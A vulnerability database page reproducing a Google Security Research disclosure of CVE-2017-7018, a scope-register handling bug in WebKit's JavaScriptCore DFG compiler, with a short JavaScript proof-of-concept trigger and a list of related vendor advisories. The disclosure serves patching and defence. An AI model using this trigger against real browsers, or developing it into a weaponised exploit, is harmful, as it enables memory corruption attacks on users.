Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormGoogle Security ResearchPACKETSTORM:143478
HistoryJul 25, 2017 - 12:00 a.m.

WebKit JSC Incorrect Scope Register Handling

2017-07-2500:00:00
Google Security Research
packetstormsecurity.com
18

0.061 Low

EPSS

Percentile

92.8%

JSON
` WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)   
  
CVE-2017-7018  
  
  
Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).  
  
void flush(InlineStackEntry* inlineStackEntry)  
{  
...  
if (m_graph.needsScopeRegister())  
flush(m_codeBlock->scopeRegister()); <<--- (a)  
}  
  
At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.  
  
PoC:  
function f() {  
(function () {  
eval('1');  
f();  
}());  
  
throw 1;  
}  
  
f();  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Related

debiancve 1
ubuntucve 1
prion 1
zdt 1
cve 1
fedora 3
openvas 9
nessus 18
archlinux 1
mageia 1
ubuntu 1
gentoo 1
apple 10
kaspersky 1
freebsd 1
suse 4
debiancve
debiancve
CVE-2017-7018
2017-07-20 16:29:00
ubuntucve
ubuntucve
CVE-2017-7018
2017-07-20 00:00:00
prion
prion
Memory corruption
2017-07-20 16:29:00
zdt
zdt
WebKit JSC Incorrect Scope Register Handling Vulnerability
2017-07-25 00:00:00
cve
cve
CVE-2017-7018
2017-07-20 16:29:00
fedora
fedora
[SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24
2017-08-07 20:18:27
[SECURITY] Fedora 26 Update: webkitgtk4-2.16.6-1.fc26
2017-07-27 16:54:47
[SECURITY] Fedora 25 Update: webkitgtk4-2.16.6-1.fc25
2017-07-31 00:22:09
openvas
openvas
Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a
2017-08-08 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5
2017-08-04 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb
2017-08-04 00:00:00
nessus
nessus
Fedora 26 : webkitgtk4 (2017-24bddb96b5)
2017-07-28 00:00:00
Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)
2017-07-31 00:00:00
Fedora 24 : webkitgtk4 (2017-9d572cc64a)
2017-08-11 00:00:00
archlinux
archlinux
[ASA-201707-25] webkit2gtk: multiple issues
2017-07-26 00:00:00
mageia
mageia
Updated webkit2 packages fix security vulnerability
2017-07-30 11:17:28
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-08-02 00:00:00
gentoo
gentoo
WebKitGTK+: Multiple Vulnerabilities
2017-10-13 00:00:00
apple
apple
About the security content of iCloud for Windows 6.2.2
2017-07-19 00:00:00
About the security content of iCloud for Windows 6.2.2 - Apple Support
2017-07-19 05:37:40
About the security content of iTunes 12.6.2 for Windows - Apple Support
2017-07-19 05:43:08
kaspersky
kaspersky
KLA11075 Multiple vulnerabilities in Apple iTunes
2017-07-19 00:00:00
freebsd
freebsd
webkit2-gtk3 -- multiple vulnerabilities
2017-07-24 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2017-11-10 18:22:30
Security update for webkit2gtk3 (important)
2017-11-06 15:08:25
Security update for webkit2gtk3 (important)
2018-01-25 21:10:00

0.061 Low

EPSS

Percentile

92.8%

JSON
Related for PACKETSTORM:143478
debiancve1ubuntucve1prion1zdt1cve1fedora3openvas9nessus18archlinux1mageia1ubuntu1gentoo1apple10kaspersky1freebsd1suse4